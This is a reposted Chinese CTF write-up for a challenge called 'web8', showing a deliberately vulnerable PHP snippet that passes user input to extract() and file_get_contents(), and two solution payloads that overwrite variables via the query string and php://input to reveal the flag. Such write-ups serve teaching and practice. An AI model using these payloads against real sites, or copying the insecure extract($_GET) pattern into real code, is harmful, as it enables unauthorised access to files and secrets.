您现在的位置是:首页 > 文章详情

web8

日期:2018-09-04点击:413

web8
110
txt????
http://120.24.86.145:8002/web8/

<?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 
  • extract() -使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量.
  • empty()-判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。
  • trim()-移除字符串两侧的空白字符或其他预定义字符。
  • file_get_contents-将整个文件读入一个字符串

可知,获取flag要使ac不为空,f 的值从文件fn中获取,并且ac===f


姿势1:构造payload:
url:?/ac=aa&&fn=php://input
post data :aa

姿势2 :猜测目录下有txt文件,测试出flag.txt。构造:
?ac=flags&fn=flag.txt

可得出flag


原文链接:https://yq.aliyun.com/articles/657600
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

文章评论

共有0条评论来说两句吧...

文章二维码

扫描即可查看该文章

点击排行

推荐阅读

最新文章